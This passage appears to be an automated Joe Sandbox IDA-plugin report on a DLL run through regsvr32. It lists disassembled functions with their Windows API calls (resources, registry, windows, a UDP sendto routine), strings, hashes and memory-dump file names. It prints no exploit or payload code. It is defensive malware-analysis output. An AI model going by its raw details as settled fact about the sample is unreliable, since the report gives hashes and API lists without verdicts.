Opcode ID: 958f7fde8cf3934525be4b4590de41da191db7979d055f19d5a6abdfe82d0e64
Instruction ID: 327ff4da5823006f03605dc28747a7ba7b3d1cf190d8e7353a19ee1d8cd02c88
Opcode Fuzzy Hash: 958f7fde8cf3934525be4b4590de41da191db7979d055f19d5a6abdfe82d0e64
Instruction Fuzzy Hash: 74515CB6A046489BCB29CBA4C8919DEB7B5EF48310F31D539F552E7291EF70B808CB54

Uniqueness

Uniqueness Score: -1.00%

Function 10028683, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
Part of subcall function 1002A6AB: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
Part of subcall function 1002A6AB: LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714

Part of subcall function 1002ACFB: __EH_prolog3_catch.LIBCMT ref: 1002AD02

Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71

GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 100286CC
FreeLibrary.KERNEL32(?), ref: 100286DC

Strings

hhctrl.ocx, xrefs: 100286B0
HtmlHelpA, xrefs: 100286C6

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpA$hhctrl.ocx
API String ID: 3274081130-63838506
Opcode ID: 7eafd78b95f4e71f9a7c2a9e0d78888fac0c88a0cb5b3df1705197983d44129d
Instruction ID: 005129d9915a41a8e27983cdb1c3ef0c0b08f3353e048253c6f2f10206dc3ba7
Opcode Fuzzy Hash: 7eafd78b95f4e71f9a7c2a9e0d78888fac0c88a0cb5b3df1705197983d44129d
Instruction Fuzzy Hash: 7D01AD39001A07ABD722DB60FD09B4B3BD4EF04751F90882AFA5AA5462DB70E9509B59

Uniqueness

Uniqueness Score: -1.00%

Function 10037AE5, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 10037AF8

Part of subcall function 10037A53: ___BuildCatchObjectHelper.LIBCMT ref: 10037A89

_UnwindNestedFrames.LIBCMT ref: 10037B0F
___FrameUnwindToState.LIBCMT ref: 10037B1D

Strings

csm, xrefs: 10037AF4, 10037B09, 10037B1C, 10037B3A, 10037B4A

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm
API String ID: 2163707966-1018135373
Opcode ID: f195471c9651215b8799b1dff3133e99b074ac86d89a3ab6fa62fa96ed46b13b
Instruction ID: f623d6fd13c583f27d9dc74078cf60041b57e54907eb0ea25ac4e83ce510980d
Opcode Fuzzy Hash: f195471c9651215b8799b1dff3133e99b074ac86d89a3ab6fa62fa96ed46b13b
Instruction Fuzzy Hash: 1301E475001109BFDF239E51CC41EAB7FAAFF08392F108014BD1C19121D736E9A1EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1003B6EA, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,1003198E), ref: 1003B6EF
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003B6FF

Strings

KERNEL32, xrefs: 1003B6EA
IsProcessorFeaturePresent, xrefs: 1003B6F9

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: b625c795e4b14fe0a5397004e64ae313e176778416d8ae412e329f0da2c945c9
Instruction ID: 1963b1661ff3506828beccd1ed570aedb4cc9858b4c3caadb466faf93440aec0
Opcode Fuzzy Hash: b625c795e4b14fe0a5397004e64ae313e176778416d8ae412e329f0da2c945c9
Instruction Fuzzy Hash: FAF09030D0090DE6EF006BA1AE4A2AF7BB8FB8134AF9204A0E295F0094CF30C074C345

Uniqueness

Uniqueness Score: -1.00%

Function 10003190, Relevance: 6.4, APIs: 5, Instructions: 119COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000007F), ref: 100031BF
SetLastError.KERNEL32(0000007F), ref: 100031EB

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: be243d1140ffaf3f5c0c670d3f2cc449d13f2587e7475c66dd1e7082ab2392ba
Instruction ID: 4eaf8ab176a3ef0a7f39cefad6a7452b8358f787e5b85b158199dac7f5a3fe15
Opcode Fuzzy Hash: be243d1140ffaf3f5c0c670d3f2cc449d13f2587e7475c66dd1e7082ab2392ba
Instruction Fuzzy Hash: D051E770E0415ADFEB05CF98C981AAEB7F5FF48344F2085A9E815AB349D734EA41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10043370, Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 10043377
_fgetc.LIBCMT ref: 100434AD

Part of subcall function 100432DD: std::_String_base::_Xlen.LIBCPMT ref: 100432F3

_memcpy_s.LIBCMT ref: 10043472
_ungetc.LIBCMT ref: 100434F8

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prolog3_String_base::_Xlen_fgetc_memcpy_s_ungetcstd::_
String ID:
API String ID: 9762108-0
Opcode ID: 99201e9437667c55015348abdb3458414e8582c21c8e059d90a996027ebc780c
Instruction ID: 13a944e20a8a26727cade03676e391ccd69925211a3dd35b2a339be84363c332
Opcode Fuzzy Hash: 99201e9437667c55015348abdb3458414e8582c21c8e059d90a996027ebc780c
Instruction Fuzzy Hash: CF515C76A006089FCB15DBB4C8919DEB7B9FF48210F70953AE552E7191EE60F908CB54

Uniqueness

Uniqueness Score: -1.00%

Function 1002B564, Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

__msize.LIBCMT ref: 1002B5F7
__msize.LIBCMT ref: 1002B61A
_malloc.LIBCMT ref: 1002B632
_malloc.LIBCMT ref: 1002B647

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: __msize_malloc
String ID:
API String ID: 1288803200-0
Opcode ID: e7775de412d4773406d2d7f9127a0febec078a8c984ec9c0c9f408937bca0ff2
Instruction ID: c06ad2b89a0fc854e88fd2117b33bcd0e6f9c9f7914c74f6532cfdf5cd9cd5d6
Opcode Fuzzy Hash: e7775de412d4773406d2d7f9127a0febec078a8c984ec9c0c9f408937bca0ff2
Instruction Fuzzy Hash: 9D218231600E249FCB55EF30F8C9A5A77E5EF04790BD18519E8598B256DF34ECA0CB80

Uniqueness

Uniqueness Score: -1.00%

Function 10003310, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 77memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,10003158), ref: 100033CE
GetProcessHeap.KERNEL32(00000000,00000000,?,?,10003158), ref: 100033DA
HeapFree.KERNEL32(00000000,?,?,10003158), ref: 100033E1

Strings

Ot, xrefs: 100033DA

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: FreeHeap$ProcessVirtual
String ID: Ot
API String ID: 190046822-718333598
Opcode ID: 4476d00a63b036dd075107593c39d6170d91511c8e44fc724c93cdb70bf08c87
Instruction ID: 2d2bd09531cc21cd0688133637c85df5768d7ec480326e7220fdcfa052c0fbce
Opcode Fuzzy Hash: 4476d00a63b036dd075107593c39d6170d91511c8e44fc724c93cdb70bf08c87
Instruction Fuzzy Hash: 2F317474A00208EFDB05DF94C685B9EB7B6FB48344F24C298E9055B395CB75AF41DB80

Uniqueness

Uniqueness Score: -1.00%

Function 100210FF, Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 10023B39
__CxxThrowException@8.LIBCMT ref: 10023B55
__CxxThrowException@8.LIBCMT ref: 10023B71
__cftof.LIBCMT ref: 10023B88

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: Exception@8Throw$__cftof
String ID:
API String ID: 887240167-0
Opcode ID: 4211e913ba8b62f1cad3a260a4951dcfba4da381e4675b2fc4cd124fb216e819
Instruction ID: 16327421f0b36ea26aeda1f7d289ca1428dc81c908886c4e3e3252d19e74a35c
Opcode Fuzzy Hash: 4211e913ba8b62f1cad3a260a4951dcfba4da381e4675b2fc4cd124fb216e819
Instruction Fuzzy Hash: 6201C07980024CBB8B11DE899C46CDF7BEDEA88250BB00152FB19C3501DAB1EE20D2A2

Uniqueness

Uniqueness Score: -1.00%

Function 10023180, Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 100231A8
LoadResource.KERNEL32(?,00000000), ref: 100231B0
LockResource.KERNEL32(00000000), ref: 100231C2
FreeResource.KERNEL32(00000000), ref: 10023210

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 8904d22b2e9766e214ab266f9aec4827302d519ac8e5ca81d82e01921d4caf04
Instruction ID: 7117f4333b49b93e9e103224ba76a384f5f6927333c7ffee97ba62033829b48c
Opcode Fuzzy Hash: 8904d22b2e9766e214ab266f9aec4827302d519ac8e5ca81d82e01921d4caf04
Instruction Fuzzy Hash: 3D110134500761EFD714CF99D988AAAB7F8FF00399F51C429E84283550D770ED58DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 100217AE, Relevance: 6.1, APIs: 4, Instructions: 57threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 100217B5

Part of subcall function 1002299D: __EH_prolog3.LIBCMT ref: 100229A4

__strdup.LIBCMT ref: 100217D7
GetCurrentThread.KERNEL32 ref: 10021804
GetCurrentThreadId.KERNEL32 ref: 1002180D

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrentH_prolog3Thread$__strdup
String ID:
API String ID: 4206445780-0
Opcode ID: 81573f6a70f85e6e6b71bd66fb05b0a7947cee5f3eccb4cfcc9ed85a086636bb
Instruction ID: 63c4b4d8ed515ebd67a2d3fac6e93b486822e3c8ffac095a61f99a1b17b282e6
Opcode Fuzzy Hash: 81573f6a70f85e6e6b71bd66fb05b0a7947cee5f3eccb4cfcc9ed85a086636bb
Instruction Fuzzy Hash: EC217DB8801B408EC321DF6A958124AFBF4FFA4600F50891FE5AAC7A22DBB4A441CF44

Uniqueness

Uniqueness Score: -1.00%

Function 10029178, Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 100291A4
SendMessageA.USER32 ref: 100291CF
GetCapture.USER32 ref: 100291E1
SendMessageA.USER32 ref: 100291F0

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$Capture
String ID:
API String ID: 1665607226-0
Opcode ID: 088ca0eca7ffd53ce47653328526b22f7a75d7299b8dffa12b2224c673d87500
Instruction ID: 9d500238946ec194ad8ffa17e766443115c43433aa0eeb43828134f684b4c91a
Opcode Fuzzy Hash: 088ca0eca7ffd53ce47653328526b22f7a75d7299b8dffa12b2224c673d87500
Instruction Fuzzy Hash: 8A0175713402557BDA205B629CCDF9B3E7AEBCAF50F510478F6089A0A7CAA14800D620

Uniqueness

Uniqueness Score: -1.00%

Function 1002ABD3, Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 1002AC0E
RegCloseKey.ADVAPI32(00000000), ref: 1002AC17
swprintf.LIBCMT ref: 1002AC34
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002AC45

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWriteswprintf
String ID:
API String ID: 22681860-0
Opcode ID: c84d023a091e3481915df690cb6fa3c091d1dd2ebdb2df30426c6b2c34bdf920
Instruction ID: b3e5ac37a67a2c34724f7244494befea3428c85a23c18ad1ae006fcf60cdee60
Opcode Fuzzy Hash: c84d023a091e3481915df690cb6fa3c091d1dd2ebdb2df30426c6b2c34bdf920
Instruction Fuzzy Hash: C901ED76500218ABDB10DF688D85FAF77ACEB49714F51082AFA01E3141DB74ED0487A8

Uniqueness

Uniqueness Score: -1.00%

Function 1003B5D6, Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 1003B5FC

Part of subcall function 1003B421: __fltout2.LIBCMT ref: 1003B44D

__cftog_l.LIBCMT ref: 1003B622
__cftoe_l.LIBCMT ref: 1003B654

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 1693f95a625ffde70028128af171decd196e1ba2c6c978d497889c3db2691634
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 85117E3680054ABFCF139E80CC028EE3F62FB09299F548415FF1958032C736D9B1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 10027839, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 10027846
GetTopWindow.USER32(00000000), ref: 10027859

Part of subcall function 10027839: GetWindow.USER32(00000000,00000002), ref: 100278A0

GetTopWindow.USER32(?), ref: 10027889

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 3cb82c9a8c8603e496fbf3d62de3cfdf58aa9b4925ce369bf6021e639fee71c7
Instruction ID: f10d52d962ac960512d7384eec108a680d17f64428226a36a785d2fcb99e30ea
Opcode Fuzzy Hash: 3cb82c9a8c8603e496fbf3d62de3cfdf58aa9b4925ce369bf6021e639fee71c7
Instruction Fuzzy Hash: F301A23618166ABBCB229F51AC08E8F3A99FF417E0F814021FD0C91111DF31D911D6E1

Uniqueness

Uniqueness Score: -1.00%

Function 1002A257, Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 1002A27D
LoadResource.KERNEL32(?,00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A289
LockResource.KERNEL32(00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A296
FreeResource.KERNEL32(00000000,00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A2B2

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: feba8fe24ac97258290d34300adbce18e9849086dee679fc7f85b56fb59f0c30
Instruction ID: f3c4c51c49c486de2effa8659e681593a38c79611994fd5387b39b2d60b42ad5
Opcode Fuzzy Hash: feba8fe24ac97258290d34300adbce18e9849086dee679fc7f85b56fb59f0c30
Instruction Fuzzy Hash: B5F0C237200316BBD7019FAD9DC4A6B77ADEF866A17524038FE09D3210DE71DD448AB4

Uniqueness

Uniqueness Score: -1.00%

Function 10001310, Relevance: 6.0, APIs: 4, Instructions: 41networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1000132B
inet_addr.WS2_32(?), ref: 10001340
htons.WS2_32(?), ref: 1000134E
sendto.WS2_32(?,?,?,00000000,?,00000010), ref: 1000136F

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: _memsethtonsinet_addrsendto
String ID:
API String ID: 1158618643-0
Opcode ID: c3eaa792e2cc8573930c6e3819606380beb20a92460ab2a72e807829517de2d8
Instruction ID: 60f6b611a07b9dfdfd37c1fffb937be7e3926c5419f3fbf29161148c0f489d21
Opcode Fuzzy Hash: c3eaa792e2cc8573930c6e3819606380beb20a92460ab2a72e807829517de2d8
Instruction Fuzzy Hash: 7A015E75900208ABDB00DFA4C986BBF77B8FF48700F504459F90597281E770AA10DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10023584, Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

EnableWindow.USER32(?,00000001), ref: 100235A4
GetActiveWindow.USER32 ref: 100235AF
SetActiveWindow.USER32(?,?,00000024,1000150C,00000000,71FAB912), ref: 100235BD
FreeResource.KERNEL32(?,?,00000024,1000150C,00000000,71FAB912), ref: 100235D9

Part of subcall function 1002A4AD: EnableWindow.USER32(?,00000000), ref: 1002A4BE

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

